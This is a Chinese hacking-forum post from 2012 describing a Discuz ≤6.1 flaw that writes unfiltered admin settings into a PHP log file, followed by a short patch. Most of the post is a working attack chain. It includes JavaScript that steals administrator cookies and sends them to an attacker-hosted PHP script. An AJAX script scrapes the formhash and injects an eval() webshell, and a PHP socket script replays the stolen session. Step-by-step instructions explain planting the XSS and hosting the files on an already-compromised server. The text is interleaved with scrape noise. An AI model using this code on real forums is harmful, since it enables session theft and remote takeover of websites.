找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4148|回复: 0
打印 上一主题 下一主题

Discuz XSS得webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:11:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Discuz XSS得webshell
+ t, D- A  `1 lBy racle @tian6.com, @$ W1 r! u) @+ j3 I
欢迎转帖.但请保留版权信息.
8 K% g$ Z6 N- Z' s0 h受影响版本iscuz<=6.1.0,gbk+utf+big5
% [% R4 v4 v  y$ G! H  h9 z6 k% o( Z' @
新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.
7 H( B* b1 [3 q" U7 m* t8 M
1 k9 o, O( S" a0 W1 i. f+ a
2 Y7 u' ?' y$ ^0 n: Q3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706! ?' |% C! B1 j# W* Z; c
当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
5 o- }' e( d5 ~: n2 E8 L) D3 A
# V$ s; W, X4 m+ k* n8 M0 {分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
+ @8 z: T4 ^9 k0 R* K本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS* n( F# u+ R4 p& T) {# Y% ]
. m! W2 j+ @" }4 J" Y

4 @, D- q" Z% E4 L7 s----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------
  A9 y( v  `2 y( U
, c5 J/ U0 J% ]4 v) Q" V7 R
2 V5 ~4 ^& P% ~% c# p7 Iproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.# B3 y" ~' H9 t0 u# t

! y+ f! v& @8 B! v6 B% C) uproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.6 _3 M! P; Q% P& O1 S
) S9 J4 b0 e" E; e- _
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.
$ s0 f3 z  V' Q7 o1 Y9 P/ c' c* r
+ T. y+ Z9 N/ @' b/ ]# f. J- P+ G& `& Z6 ?; Q# {
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
6 T# p1 j: e) [! P( F* ]; p; ]! H, m2 M) }
        global $runwizardfile, $runwizardhistory;
- _1 n. u* V- H( w% c, f
6 C6 a6 L0 j( |        $fp = fopen($runwizardfile, 'w');
- a; r' L1 y" _1 {
& n8 ^7 t% M0 b) Z+ E, C        fwrite($fp, serialize($runwizardhistory));
" }4 ^- m2 O3 C- w1 w: F: q
5 P' s& @2 ^# v  e5 r2 W  x  ]        fclose($fp);
: a: H8 `% B% F# W, n4 g. k
8 d" d+ Z3 [- `6 {9 K' r}
- q; j+ x6 l! E; o& X- P复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
8 D& v( }. g% f1 ]) P( b! k( O- ]" P以下是修补的办法:function saverunwizardhistory() {
; t' \+ M% q! P
, E- Q1 t5 a9 ~" w! O! @. ?        global $runwizardfile, $runwizardhistory;8 P/ t. J# K+ U1 _9 b

7 a: A# x2 L/ R5 l4 H        $fp = fopen($runwizardfile, 'w');
# M, V7 |% J1 l0 k$ X1 ~
1 r5 K: ?5 z9 d$ W. c        $s = '<?php exit;?>';
0 v1 D' o) T: ~  }, }* \# B6 ]
9 }- D" s8 @9 Y/ I& S. W! m        $s .= serialize($runwizardhistory);/ |% L8 h# t, t: R/ F
/ W4 [2 G5 U/ g7 p; T* l
        fwrite($fp, $s);% i- N6 v# {6 l
. ~/ \$ l2 k# j. r7 m4 r4 C% W5 i
        fclose($fp);
  @) X# ?  S. N4 \
! i  n% _& M' ]' G}+ }) H; k3 ]8 G! H( |$ k! @
复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.
9 |. {# l: @& P& W7 M5 K" K) a
4 ~2 _5 ^4 ~% d& ], g4 ]

# _4 Z# r8 m. z, W) k; s6 g% D5 J----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------% y% l% S, _7 \( z

$ t8 d% |: M. I! B7 ~6 x: P% d
7 p& U$ X+ e7 _# }4 k; p  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.
3 b$ L9 D; n2 ^9 c( l+ M5 V0 A+ q0 E- \' m" H" b) B8 C6 [
我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
% k2 y3 z7 H( X  F6 G( W
$ k' n0 \  N( [这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.
) }/ r2 Q6 P( |% ^5 P* j
4 I3 ?  n9 `, b) ?* a5 ?首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:0 \, i, S) p5 r! B7 z

3 X  D9 n1 q6 n. G7 v+ i* xvar url="http://目标网站/admincp.php";      1 C1 l% h7 ]- s
  J/ p# r. E- T4 Y
/*获得cookies*/# F9 g3 r3 Q# X9 v: _

9 z2 M0 H! y' I) z; q5 R  Z4 }function getURL(s) {; R6 E" J, S0 c
4 F. Q& O: I2 B! a& T8 i6 W  U
var image = new Image();
; [5 r2 b$ q) F; Z$ b; R& [- i" w. {% m4 x2 O
image.style.width = 0;
" {# V& c) ~4 O6 s' N4 o
4 Q2 j  H$ J7 g) E& vimage.style.height = 0;
% l$ n+ O- l* n% v4 t* _% `4 s( K* _. P' E
image.src = s;
6 J+ ]: ~! Y' `  m: B2 I, _9 ]7 m6 j: A/ I9 Z+ R
}  \% ]9 H; x) h2 o- m
) Z  z% l( x2 F$ X! T2 a
getURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
0 T6 N$ K8 i9 n  w8 v6 D; Q8 K复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
4 ]5 K- W; Q) l/ m) y8 @1 h4 l复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵) - t, H; f/ s  i1 o7 D

1 D8 q  N1 n  {# ?% _9 Q" ^; m9 Y6 e# ?3 L+ a0 V# l' U
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";) |8 u8 z. f: C9 y

9 j0 _. D5 [' c* D6 r+ p# d
2 y6 y  L9 M* U1 l3 z/ f/ F, c$ q( O. x" y$ e- U
/*hash*/
: ], S7 w9 j  v/ P( ]; r
/ e9 v/ v; G9 A+ g; `7 u4 M3 L) @var xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
: T9 y3 ?" W( E6 T: c# h0 x' p+ k/ |5 e$ D7 j  a2 h  D& S
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
8 Z6 y, {' {5 Y. Q; L, O; B5 y% q2 }3 H) {/ n- C- X5 Z; Y
xmlHttpReq.send();2 A. o- d+ e$ m! F" K( Z  N3 B* W9 g

3 L  l/ X( R" Q# i% s; M: xvar resource = xmlHttpReq.responseText;
( B3 z3 {- G6 _2 |1 Y8 D, A
" A4 i- h" D" j: Y9 ivar numero = resource.search(/formhash/);
; t0 H* J* a7 b, L2 D5 c  H" R! I' D" a6 l& o5 l5 y
var formhash=encodeURIComponent(resource.substr(numero+17,8));! L; y3 f# ^, z/ ]5 x

" B% N4 _1 |! U) o% U* H, @9 P7 i1 _

. e7 s  g8 i1 [. ^/ a4 q- Yvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
+ o6 }5 r" l' L) l. {6 n1 T4 x+ I2 I' r( y/ a3 F- T1 Z% @
xmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接,以异步方式通信 # W6 ?6 J" @, A, w/ _* I  S6 A
. G& A: m" y: j  ~; ^
xmlHttpReq.setRequestHeader("Referer", url);( [% v  |/ z* L0 ]; @

& z4 O/ o; v1 kxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");6 u3 K( b# ]2 n. e' u; T
+ i5 ]1 W9 b) d8 r( v. S
xmlHttpReq.setrequestheader("content-length",post.length); : F' b4 {9 A# k/ U7 d* N
$ i0 Y: A7 u0 p/ e8 f2 I# O$ F
xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
9 p9 @) b% l  W9 t  s1 h. @: ?% ~9 }3 B2 O$ A" N3 n8 L, M2 Q
xmlHttpReq.send(post);//发送数据
, d7 L" w2 u8 P复制代码这里HASH我假设正确,这样提交,也无须cookies# v( d0 T( c2 t6 _, a. T. `

: _, K- {( w5 u6 b+ k- K- O再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
5 ]% s. Z( {% n# J& R6 t+ m
% h- o# Z# D" T0 n1 j2 t; hif (!$sock) die("$errstr ($errno)\n");  I' K. _+ h$ b, j
5 ^1 K! ]2 ]; x, S
$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';
7 o: k$ U  |- s# j$ d
! f5 S$ @* h( e5 G3 _1 p: ^; g1 p2 |: r6 q: G) A! ^" ]
. [  {8 v1 \: P% j5 o# Y
fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");7 C' p+ d$ T1 g

! D& p2 |7 q0 y' T- p1 v( Wfwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");8 ?, X6 o" Y6 a% T1 T; J' B
$ R) G) |! s1 K# I( W! W- i$ ?
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");7 a2 M) ~! _8 m' c% i  }# Y3 a

, ]0 ]! N5 j' c; b/ }+ ffwrite($sock, "Accept-Language: zh-cn\r\n");3 X0 \# x5 ?0 _7 @6 k0 E
0 `' R: R4 t- W# ?+ I% l4 X
fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");: z# Z) m# k6 O% {7 e9 ]) C/ Y

8 W7 I+ v' Q+ F& j7 wfwrite($sock, "Accept-Encoding: gzip, deflate\r\n");! Y$ H4 B  d+ D4 F0 s

0 k/ S! b& i+ |3 ?% ~8 afwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");# {5 ]4 D! b8 Y- c

/ H. a+ L# C, xfwrite($sock, "Host: $url\r\n");  A$ m. O7 d5 R( H( D  z; ]/ u5 B5 u& Q

: Y2 a$ i0 H! c2 D  K; N/ X. Xfwrite($sock, "Content-Length: ".strlen($data)."\r\n");# R- E% e+ \6 n/ Y
$ }6 `" F2 D% r/ B
fwrite($sock, "Connection: Keep-Alive\r\n");
: S  _- X& ^4 W  O+ e# [$ n+ Q4 H
5 O2 n& w% u9 wfwrite($sock, "Cache-Control: no-cache\r\n");
, V. a. U  D/ a; J* D9 M9 G3 C: B5 e, E( Y
fwrite($sock, "Cookie:".$cookies."\r\n\r\n");/ k* g0 _, n  p9 Q9 H) e! |( ]
1 @, C) h; L6 c
fwrite($sock, $data);
) A8 i: X0 o. I9 p; }) m8 E- C3 R3 O( ?" L( }% E7 e8 G

! x% `4 N* H6 f; ~+ B  n* C3 f! o5 H, S' G1 v
$headers = "";& D+ G; c' @* y( T7 \4 Z" Q6 v

. O, u/ o. B2 X) `. h7 s% `while ($str = trim(fgets($sock, 4096)))
0 A- V" p1 ^9 p: }; E, Y8 @2 ^3 {5 e' `4 s
     $headers .= "$str\n";
( F5 U5 C( w. S4 K4 |' Z  A4 v+ g0 ^- @3 l! i, M* }
echo "\n";) [$ X- R3 v% l/ L
7 M7 c0 v7 z3 z( H4 f9 G
$body = "";% W( w6 }" s( Q

1 u3 D8 _# B/ }9 B/ B* V! W: [while (!feof($sock))9 n  P" S; O1 `4 M

  j* D/ X) h# p4 c: g( X& k     $body .= fgets($sock, 4096);
! R5 |, J, H, |
6 ]+ i+ [" n9 [fclose($sock);8 F7 c5 J& c: u# P# U0 E

& W6 U9 q% l) |% e' {- E6 Vecho $body;
' i# K- X% O/ Q: h9 v复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^
1 D% Q; k6 o/ \; G& k8 @% [# U  R9 H" _3 n7 p' ~3 _
' Z6 P5 h# B5 E+ v3 W  w
-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
! g) F* |* B& i, @7 ^+ K. F
8 r' B$ }1 {/ O, b; U2 {7 [' G: @* Y( I- y8 b
1HP SOCKET利用方法首先打开racle.js6 `$ X6 F4 g+ H! r& v- [; N

+ o& G6 B9 [4 z0 ivar url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
% w) o, f0 U! P, g2 |+ p# g1 @
8 z& L  d: h% k& q$ T9 G: l. I5 _+ W! s2 W5 S, p6 ?

: c5 y' _/ N) \/ E然后打开racle@tian6.php
  y3 x; X- y# I6 h. I( e3 j! ]* T7 `; l& L3 f4 @, H2 B: g: Z" R
$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com
% R  K- m8 {  a' Q9 ~7 l
$ _7 j) x6 U. X  ~! N; C0 x4 Y. T! ]" L5 D& o; X; I
5 m& o5 y- X9 s
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
7 K7 d# v* a6 E+ D3 X$ h9 c
( W2 ~, F. @4 L0 L1 [% XgetURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));, D. i2 j$ u) \: S" T7 n

7 c; X/ v2 h$ A; K/ T0 L% R
! \3 a- _; d0 b4 t( B
$ \: @7 o) j7 ]0 x- @getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
1 t- Y) b8 S% H- ?3 y复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.
$ N( w# p$ D/ B/ }# {; v- z$ Z3 r! w
) e7 R" }' V3 i) t% P+ K: U$ X. c4 X$ b0 m& S2 j4 \* R6 b

1 w; a( H* c. T! x3 p- R2 z如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
8 E* E5 |2 |% C; t" s' q5 P* c4 z* K
var formhash=encodeURIComponent(resource.substr(numero+17,8));) @; q- Z4 m+ C5 U
* L* i" [5 M- i6 t, b

7 t( ^" t1 [. e3 n1 D$ ]' {' E2 [9 m. ?. H, [5 T
var formhash=encodeURIComponent(resource.substr(numero+9,8));! a4 E+ c/ m  C7 H- S
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
0 e0 o) A% W% s8 X9 p. M
1 h8 O4 F$ i7 o- t& @- d如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.
( E( }1 L( ]. b' F  _5 M8 q- l) h- @) D+ p3 h; H: d4 {1 H
如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点./ T9 c1 @8 m+ a; v
+ d9 e- i0 y: p4 g+ r6 f. L
不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
1 k. A3 m0 J9 I- {2 q3 a( v 9 K  d3 p3 A- `) Q0 b( Q" q- I
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表